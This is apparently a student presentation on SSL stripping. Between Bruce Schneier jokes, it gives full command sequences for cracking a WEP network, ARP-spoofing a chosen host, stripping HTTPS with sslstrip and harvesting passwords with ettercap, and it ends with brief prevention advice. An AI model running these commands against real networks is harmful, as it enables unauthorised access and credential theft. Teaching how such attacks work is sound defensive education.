Man-in-the-Middle WithKyle Benson SSL Strip

Trevor Kiernan Glen Saunders Bruce Schneier's earliest childhood memory is encrypted.

Attack

Bruce Schneier's p is irrational, and his q is imaginary.

What is SSL?
Secure Socket Layer Predecessor to Transport Layer Security (TLS) Establishes a secure connection between two computers Important for banking sites and others Authenticates: the server is actually who it says it is

How Does it Work?

Runs on port 443 (not http's port 80) Client sends server hello and certificate Server sends a signed certificate Verified by Certificate Authority such as Verisign Certificate used to encrypt data

What is MITM?

Alice is trying to talk to Bob Eve jumps in the middle

ARP spoofing (wireless) Physical insertion (wired)

Eve tells Bob she is Alice and Alice that she is Bob
Bruce Schneier killed Eve and Mallory with a birthday attack!

Bruce Schneier is always the Man in the Middle.

What is MITM?

When Alice sends something to Eve (thinking she's Bob), Eve can read it Eve forwards this information to Bob Bob replies to Eve (thinking she's Alice) Eve can read e-mail and intercept supposedly secure data (user name and passwords!)

What is ARP Spoofing?

ARP = address resolution protocol Alice sends ARP request (who is 192.168.1.1?) Eve replies before router can so that Alice thinks she is the router Now Alice's ARP cache is poisoned; thinks Eve is the router Eve forwards packets to her router

What is SSLStrip?

Performs afforementioned MITM attack Forwards all regular HTTP traffic Changes Alice's HTTP request to HTTPS Forwards this request via HTTPS to Bob Explicit HTTPS request is sent a fake certificate signed by Eve Replaces images with secure lock

Bruce Schneier can draw a perfect circle with an Etch-aSketch.

Capturing Information

Ettercap pulls passwords and user names for many different programs and protocols Displays Bob's IP and URL SSLStrip creates a log file

Bruce Schneier can break elliptic curve cryptography by bending it to a circle.

What we did

1. Scan for networks 2. Crack a network 3. Connect to the cracked network 4. Learn about a host on the network 5. MITM on that Host 6. Strip his/her SSL 7. Scan for usernames and passwords 8. Exit gracefully

Bruce Schneier can divide by zero.

Scanning for Networks

Airodump-ng wlan1

Crack it

airodump-ng -c 11 -w target_router wlan1 & aireplay-ng -1 0 -e target_router -h [faked mac address] wlan1 after successful connection, aireplay-ng -3 -e target_router -h [faked mac] wlan1 let the data rate climb and aircrack-ng target_router-01.cap Within 5 minutes you should have the WEP key. :-D

Connect

Connect to the router with the card you just attacked with. It should still have the same faked mac address it was set to in the previous arp-replay attack So now its time for some recon

The tattoos on Bruce Schneier's fists say "Alice" and "Bob". You don't want to make him exchange keys over your face.

Bruce Schneier counts in binary. With his fists.

RECON

Nmap -sP 192.168.1.0/28

This keeps the packet count lower and limits it to pinging We liked 192.168.1.2 Ran an os fingerprint on it and checked which versions open ports were using This generates a lot of traffic This host looked good, and responded to our probes, so lets MITM.

Find a host

Compilers don't warn Bruce Schneier, Bruce Schneier warns compilers.

RECON homing in

MITM

arpspoof -i wlan0 -t [their ip] [router ip] arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1

Bruce Schneier is always the Man in the Middle.

SSL strip

sslstrip -a -k -f

-a : log all ssl traffic -k : kill current sessions -f : insert a lock icon in their connections

Bruce Schneier's work isn't peer reviewed. He has no peers.

Passwords from the stream

ettercap -T -q -i wlan0

-T : text only -q : do not display packet contents -i : interface to use

This will log traffic over our connection and filter the target's passwords, causing them to show in our window. We can pipe this to a file as well.
The set of Bruce Schneier's weaknesses is a mathematical constant. It is represented by the symbol .

If Bruce Schneier wants your plaintext, he'll just squeeze it out of the ciphertext using his barehands

Secure your damn network! (WEP is NOT secure!) Wireshark

How to Prevent?

ARP replies appearing very frequently Invalid certificate error Nmap scans

Don't accept certificates that aren't verified Static ARP tables